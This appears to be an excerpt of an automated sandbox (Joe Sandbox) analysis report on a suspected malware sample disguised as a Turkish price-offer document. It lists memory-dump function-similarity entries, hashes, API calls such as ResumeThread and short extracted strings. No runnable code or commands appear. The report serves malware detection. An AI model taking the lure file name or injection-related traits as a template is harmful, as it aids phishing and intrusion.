                                            • API ID: MessagePost
                                            • String ID: qMOW
                                            • API String ID: 410705778-141267435
                                            • Opcode ID: 56a653fa7c92e1131c44601bbc222c3b72c256f92e004e60ba0b15fad341eb52
                                            • Instruction ID: 58dbe70d003942e17e2f6af0820a48f1acced9df2edabf46b9a322d83de76de4
                                            • Opcode Fuzzy Hash: 56a653fa7c92e1131c44601bbc222c3b72c256f92e004e60ba0b15fad341eb52
                                            • Instruction Fuzzy Hash: B13146B9D05258AFCF10CFA9D580ADEFBF5AB49310F24901AE818B7310D775A945CF64
                                            APIs
                                            • OutputDebugStringW.KERNELBASE(?), ref: 0314B31A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: DebugOutputString
                                            • String ID: qMOW
                                            • API String ID: 1166629820-141267435
                                            • Opcode ID: 6aae90e162d3eca8d5022821c6b1763b9741e68db0ecd1d5783fd05101da28d1
                                            • Instruction ID: 4daf058a137b457bfc96c1f999cac3851f055b4ebe445f558145b6bb3f97fffe
                                            • Opcode Fuzzy Hash: 6aae90e162d3eca8d5022821c6b1763b9741e68db0ecd1d5783fd05101da28d1
                                            • Instruction Fuzzy Hash: 6931CAB4D042499FCB14CFAAD984ADEFBF5AF48310F14902AE858B7320D774A945CFA4
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 09F8D2FE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID: qMOW
                                            • API String ID: 947044025-141267435
                                            • Opcode ID: b4a29786da490ae10f302d6523f572a4a5d4863321271b225cf40386cc498f36
                                            • Instruction ID: ba245068b8031bfde421c0c495256b52b41586eb005a1dc2248743f412dcb807
                                            • Opcode Fuzzy Hash: b4a29786da490ae10f302d6523f572a4a5d4863321271b225cf40386cc498f36
                                            • Instruction Fuzzy Hash: FA31C9B4D012599FDF14DFAAD880AAEFBF5AF49310F14942AE815B7340CB35A901CF94
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 09F8D2FE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID: qMOW
                                            • API String ID: 947044025-141267435
                                            • Opcode ID: f939ede6f7951fa12f85af8dcf5595b559f81d4df901d9ac0e4a0a22b3cc6126
                                            • Instruction ID: cb03c21333ebe3474bd05f658df7051cb0481cd9e14b04939b3124aad0682a05
                                            • Opcode Fuzzy Hash: f939ede6f7951fa12f85af8dcf5595b559f81d4df901d9ac0e4a0a22b3cc6126
                                            • Instruction Fuzzy Hash: 8931A7B4D012199FDF14DFAAD880AAEFBB5AF49310F14942AE815B7340CB35A901CFA4
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 0314B3F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID: qMOW
                                            • API String ID: 2962429428-141267435
                                            • Opcode ID: 990cc9693893cb830adf72817b3ac830360edc0b4eb5e40d52a92d39c539de41
                                            • Instruction ID: 05d9f160ee1f8e61c099cf4caba31ac9e93ad5a61623957798079237c49cd1b2
                                            • Opcode Fuzzy Hash: 990cc9693893cb830adf72817b3ac830360edc0b4eb5e40d52a92d39c539de41
                                            • Instruction Fuzzy Hash: 8A31BBB4D04259DFCB10CFAAD484AEEFBF4AB49310F14906AE915B3350D374A945CFA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1433487717.0000000002F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F6D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2f6d000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d44ce6b572e1833ff0a5436212800867581bddf88b1747778f49ba311153f2ca
                                            • Instruction ID: c471561f2b81ac2abbff89f93efa10f4999ccacc973b2a57ca6f27f5c95f9b6e
                                            • Opcode Fuzzy Hash: d44ce6b572e1833ff0a5436212800867581bddf88b1747778f49ba311153f2ca
                                            • Instruction Fuzzy Hash: BE212572704344DFDB04DF14D9C8B26BF65FB88368F248169EA090B756C336D856CBA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1433557986.0000000002F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2f7d000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28c6d2822711ddf70f05e42a1baaa4098f4c9cb0646c12ef89c92e039c609f1e
                                            • Instruction ID: 2fab6c6c16f8b576f3e17309f168e8dbbb8f7590a145c19364e5043ae4763a7f
                                            • Opcode Fuzzy Hash: 28c6d2822711ddf70f05e42a1baaa4098f4c9cb0646c12ef89c92e039c609f1e
                                            • Instruction Fuzzy Hash: FA212571A04304DFEB04DF10D9C0B15BB61FF98314F60C56EDA494B242C336D407CA61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1433557986.0000000002F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2f7d000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 38f58b43b9c47ce7f34f3429a7331d653aa304533ed8ad922d2454ff9fb4df77
                                            • Instruction ID: 7739a8eb5348223e9860926edc3e1615e50af9486d9c3939eb0f9ef2c694f3c2
                                            • Opcode Fuzzy Hash: 38f58b43b9c47ce7f34f3429a7331d653aa304533ed8ad922d2454ff9fb4df77
                                            • Instruction Fuzzy Hash: 70212276604300DFDB14DF10D984B16BB61FF84B14F60C56EDA0A0B28AC33AD407CA62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1433557986.0000000002F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2f7d000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45e1b85e749dfc12af746d45dfb84d6c0ec3a9d2dfa2edecc93b7e95bacc402d
                                            • Instruction ID: 06e9b281ad3e3b04dfb9a1b367b2d5bf4a807cc0b2ad9f4b693a6ee4e00dfe8a
                                            • Opcode Fuzzy Hash: 45e1b85e749dfc12af746d45dfb84d6c0ec3a9d2dfa2edecc93b7e95bacc402d
                                            • Instruction Fuzzy Hash: 4B2150755093808FCB12CF24D994715BF71EF46614F28C5EBD9498B6A7C33A980ACB62
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1433487717.0000000002F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F6D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2f6d000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                            • Instruction ID: f9cc00e40df7c676e78ea490e1f8429ef9f592f93935d34a61ec4d281b41fe5b
                                            • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                            • Instruction Fuzzy Hash: 1811D376A04284CFCB15CF14D5C4B26BF72FB88328F24C6A9D9094B756C33AD856CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1433557986.0000000002F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F7D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2f7d000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                            • Instruction ID: d1afacf6a4086be652668608c89d1924624f2e1609dfc737c4683d5a693cb7e4
                                            • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                            • Instruction Fuzzy Hash: C111BB75904280DFCB05CF10C9C0B15BBA2FF84224F28C6AED9494B296C33AD41ACB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0e&$0e&$0e&$\-'K
                                            • API String ID: 0-2311737308
                                            • Opcode ID: 6682106d2c4f7fb66dc4193b78479affa8983933445cd2cf5e5711123a8da674
                                            • Instruction ID: 9db165a92eec088148df9bd7bac3c0121e980c954f980c76f3ddfae21547ca65
                                            • Opcode Fuzzy Hash: 6682106d2c4f7fb66dc4193b78479affa8983933445cd2cf5e5711123a8da674
                                            • Instruction Fuzzy Hash: AA61E274E1521ADFCB08CFAAC5949DEFBF2FB89210F24942AE415B7214D7309A42CB64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0e&$0e&$0e&$\-'K
                                            • API String ID: 0-2311737308
                                            • Opcode ID: 931d50f0ce5e4d10c8d38802f694a4a39380ca9d45bed7e986084bb1da092f09
                                            • Instruction ID: 048cbf66cc1a5a921ff02f51297e002408753bd8a0f13fc384aa87ca0807bc2c
                                            • Opcode Fuzzy Hash: 931d50f0ce5e4d10c8d38802f694a4a39380ca9d45bed7e986084bb1da092f09
                                            • Instruction Fuzzy Hash: 2961E374E1521A8FCB08CFAAC9949EEFBF2FF89210F24942AD415F7254D7309A41CB64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: }'|k$}'|k
                                            • API String ID: 0-2488349039
                                            • Opcode ID: 047b3053cd2d0821a1ed63d2753896b1637c6af852da034b982d4225b19da157
                                            • Instruction ID: 1df6dc9c71d13cd4f06519ec574cc7120b61534a8e1f4f5494ea91e08bc70d9f
                                            • Opcode Fuzzy Hash: 047b3053cd2d0821a1ed63d2753896b1637c6af852da034b982d4225b19da157
                                            • Instruction Fuzzy Hash: 2671E274E01209DFCB48CF9AD584A9EFBF1FF88311F14956AE415AB224DB30AA41CF54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: }'|k
                                            • API String ID: 0-3707336978
                                            • Opcode ID: cda6c757355afeff5e3b0d826b81c08fac499ec197e3b3416c70a31e04fbe790
                                            • Instruction ID: 6b7509eb9d772ec86608dcf48a729740d0965285a0b6ffa70fae9eac61d63399
                                            • Opcode Fuzzy Hash: cda6c757355afeff5e3b0d826b81c08fac499ec197e3b3416c70a31e04fbe790
                                            • Instruction Fuzzy Hash: 9C71E274E052099FCB48CFAAD58499EFBF1FF88310F14956AE415AB224DB30AA41CF54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: jPo@
                                            • API String ID: 0-2379927603
                                            • Opcode ID: b0f8e1f6d520e78f8fc28702c27154617741ab2cf9231f11857ff24cc087564f
                                            • Instruction ID: 2683f4b918797f6a166a953cd9c3b3467e1b483ded4c03e2425ead0b6ab6e547
                                            • Opcode Fuzzy Hash: b0f8e1f6d520e78f8fc28702c27154617741ab2cf9231f11857ff24cc087564f
                                            • Instruction Fuzzy Hash: 43717F70E002299BDB14CFAAC6805AEFBB6FF89305F24C169D819B7345D7309942CFA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: jPo@
                                            • API String ID: 0-2379927603
                                            • Opcode ID: 9696d2f78cae0a0f278a5873611025970c9f1f24dfb45b842fdb1c7cbff42a99
                                            • Instruction ID: 06fb53a45e0c1ffa92ed5050705c497f6b7d3b2a6f9e6ce2aa631c889c41ad01
                                            • Opcode Fuzzy Hash: 9696d2f78cae0a0f278a5873611025970c9f1f24dfb45b842fdb1c7cbff42a99
                                            • Instruction Fuzzy Hash: 38719170E002598BDB14CFAAC5805AEFBB2FF89301F24C16AD809A7345D7309D42CF61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: qMOW
                                            • API String ID: 0-141267435
                                            • Opcode ID: 5d701291f91a3d9d486550706a9fe5b63c6506cbc5f8398b8cdfbadf3b2b4961
                                            • Instruction ID: 02bd8849e602753020523bb786366e82ba876f8327ac9453426357cf5a711300
                                            • Opcode Fuzzy Hash: 5d701291f91a3d9d486550706a9fe5b63c6506cbc5f8398b8cdfbadf3b2b4961
                                            • Instruction Fuzzy Hash: D4417F71E006188BDB58CF6B8D4479AFBF3AFC9300F14C1BA851CA6265EB3049468F51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0\-;
                                            • API String ID: 0-635978658
                                            • Opcode ID: a65c45c915c1cf98c65ed2473947f39c7dc64f62385cbee73844f9e1b28e093d
                                            • Instruction ID: 17802b500d03ffa1793a474f5fd042f7390595d0bbabb058e26670edb246bb1d
                                            • Opcode Fuzzy Hash: a65c45c915c1cf98c65ed2473947f39c7dc64f62385cbee73844f9e1b28e093d
                                            • Instruction Fuzzy Hash: 9D41E5B4D0520ADBCB08CFA9C5805EEFBF2BB99311F64D56AC419BB214E7349A41CF64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0\-;
                                            • API String ID: 0-635978658
                                            • Opcode ID: aae42ea14380d0d3422b80c27fa7fdac21c463ffa75ce7ced2ef159e712b8004
                                            • Instruction ID: 1019cb82410c017afb453de3e12fad48d97bb80b479af3077930d5cac3ec4673
                                            • Opcode Fuzzy Hash: aae42ea14380d0d3422b80c27fa7fdac21c463ffa75ce7ced2ef159e712b8004
                                            • Instruction Fuzzy Hash: 064124B4E0520ADBDB08CFA9C5805EEFBF2FB99311F64C56AC414BB254D7349A81CB64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445035094.0000000009F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f70000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 542b59d60949f7f0157f636b2c5b76ec923a6d497d032aea088340db1d284118
                                            • Instruction ID: 2a7de8590fe969922a2aa601b02f3df75b852728ee23bcd560c19bdf8551ffca
                                            • Opcode Fuzzy Hash: 542b59d60949f7f0157f636b2c5b76ec923a6d497d032aea088340db1d284118
                                            • Instruction Fuzzy Hash: 27325170E103189FEB54EF69C8547AEBBB2FF88340F1485AAD409AB345DB349D45CBA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52259e7dfae52a3a9de559651ce484f685cd63b8fcdf75b2f342d95f701e19dc
                                            • Instruction ID: 634064a2f9233c6f66b205c4543a0e7d21ed14fd4628f49a6a566efe99366001
                                            • Opcode Fuzzy Hash: 52259e7dfae52a3a9de559651ce484f685cd63b8fcdf75b2f342d95f701e19dc
                                            • Instruction Fuzzy Hash: 44E10774E006198FDB14DFA9C580AAEFBB2FF89305F248169E454AB355D730AD42CFA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4df1907e0cc5e59d1388468f420478575343b244b6587cf297b71fd77196475b
                                            • Instruction ID: 6bf774dcc2c848afc33d51a72850993d22e3d7676876c0fbdb72af977cff8f27
                                            • Opcode Fuzzy Hash: 4df1907e0cc5e59d1388468f420478575343b244b6587cf297b71fd77196475b
                                            • Instruction Fuzzy Hash: 7AE10A74E106198FDB14DFA9C580AAEFBB2FF89305F248169E414AB355D731AD42CF60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e75d9263b94d8a36a96a7a30e64c34fb24ed64702e74825d49b3b10f5f2d6bcf
                                            • Instruction ID: 23521e6caf6b7a38ce3aeab0c05889d9ebaf02cb2c05149dc0755125c3ce9cb8
                                            • Opcode Fuzzy Hash: e75d9263b94d8a36a96a7a30e64c34fb24ed64702e74825d49b3b10f5f2d6bcf
                                            • Instruction Fuzzy Hash: A5E10974E006198FDB14DFA9C580AAEFBB2FF89305F24816AE414AB355D735AD42CF60
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a84715b88c6518a1966b7afde89ae09e5ede4aba5f12f960846660d2e98e1742
                                            • Instruction ID: d39956db0c076b826e4bb6147e8c842606df0485e1438444e515ab2640e42e8f
                                            • Opcode Fuzzy Hash: a84715b88c6518a1966b7afde89ae09e5ede4aba5f12f960846660d2e98e1742
                                            • Instruction Fuzzy Hash: FCE10A74E002198FDB14DFA9C580AAEFBB2FF89305F248169E454AB355D730AD42CFA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d430da23ebd3d07be9ce326404663cf3c287667181acf459be4e0984df48895
                                            • Instruction ID: dda851f3da8450e814b75df704b171a72e69fe837b716267201b2a64e368d69b
                                            • Opcode Fuzzy Hash: 7d430da23ebd3d07be9ce326404663cf3c287667181acf459be4e0984df48895
                                            • Instruction Fuzzy Hash: CDE1E974E002198FDB14DFA9C580AAEFBB2FF89315F248169D418AB395D730AD42CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445035094.0000000009F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f70000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6282a7d80ebc6409dd11b96dd256cad4eded2559490c8fc89976bcfda8f2b895
                                            • Instruction ID: f9db213fc1d39433a7879f1ddfbf0f8ede90daf603d87553857e5b3f14698b1f
                                            • Opcode Fuzzy Hash: 6282a7d80ebc6409dd11b96dd256cad4eded2559490c8fc89976bcfda8f2b895
                                            • Instruction Fuzzy Hash: ABC14931E103189FDB15DFA5C88079EFBB2BF88310F14C5AAE449AB255DB74A985CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445035094.0000000009F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f70000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de282fa78a8f6a495f8f84ec4f777cb1224b02bada76a49355866ec2d77eb7a7
                                            • Instruction ID: bbf2d8dd101d5829472f5a0694e07fdd92ca712931ec7da02e03191c36c9ce48
                                            • Opcode Fuzzy Hash: de282fa78a8f6a495f8f84ec4f777cb1224b02bada76a49355866ec2d77eb7a7
                                            • Instruction Fuzzy Hash: A8C13931E103189FDB15DFA5C88479EFBB2BF88310F14C5AAE449AB255DB74A984CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49e9926335cb86038e5990f576a5aafef07695fec4114a2008c620b3f10046ef
                                            • Instruction ID: d44e6f62d2b4ab4b07ac051c8d894fd8728ecaf838c7307cfc9fced467f79e14
                                            • Opcode Fuzzy Hash: 49e9926335cb86038e5990f576a5aafef07695fec4114a2008c620b3f10046ef
                                            • Instruction Fuzzy Hash: 42B16275E006588FDB58DF6AC944ADDBBF2BF88301F14C1EAD909AB364DB305A858F50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445035094.0000000009F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f70000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c877b7036f1a4b766edfa1addd98a2c8554705a7424b1ee7279ebcde3f9b15dd
                                            • Instruction ID: 15b6ab07d700ab4406f0f8b610cd8853ebeba9ffe5741279868dd60a3a4ed473
                                            • Opcode Fuzzy Hash: c877b7036f1a4b766edfa1addd98a2c8554705a7424b1ee7279ebcde3f9b15dd
                                            • Instruction Fuzzy Hash: 4F91F671E106198FCB54CF69C980A9DF7F1BF89304F6492AAE419EB351EB70A981CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445035094.0000000009F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f70000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77c5cb0947dce2d274da993144c932e03687dd8cf3f6ccd903e9cdc4a872cd5f
                                            • Instruction ID: 1bf23437af290e80b2c043101cc4c12d2b6d938fdba03ffd5179d00fdba33d67
                                            • Opcode Fuzzy Hash: 77c5cb0947dce2d274da993144c932e03687dd8cf3f6ccd903e9cdc4a872cd5f
                                            • Instruction Fuzzy Hash: 6291F671E106198FCB54CF69C980A9DF7B1BF88304F6492AAE419EB351EB70A981CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9f80000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ae8125256ec622c424868facf7170ef8de4128bcc4a90b69ed472afca0e1765
                                            • Instruction ID: 4bed5cfeec5b0e292efcfac6b79a0b541b06d0fe116485e1276f42356ab6bec2
                                            • Opcode Fuzzy Hash: 1ae8125256ec622c424868facf7170ef8de4128bcc4a90b69ed472afca0e1765
                                            • Instruction Fuzzy Hash: EA611672D09208CFDF54DFA9D444AEEBBB6FF8A390F109029E429A7211DB346946CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434124585.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_3140000_fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4268c231c333e21c5855a62e6c15e7f0c77f14f9b6f3edf8ddd7b83b0dd3c449
                                            • Instruction ID: e928f4e4d858ff9bff977fe0af5a867f41c114dba54c749da3f11ee702ef847d
                                            • Opcode Fuzzy Hash: 4268c231c333e21c5855a62e6c15e7f0c77f14f9b6f3edf8ddd7b83b0dd3c449
                                            • Instruction Fuzzy Hash: 7471F974E042299FDB14CFA9D990AAEFBB2FF88300F1491A9D809A7315D7319D41CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1445094076.0000000009F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F80000, based on PE: false
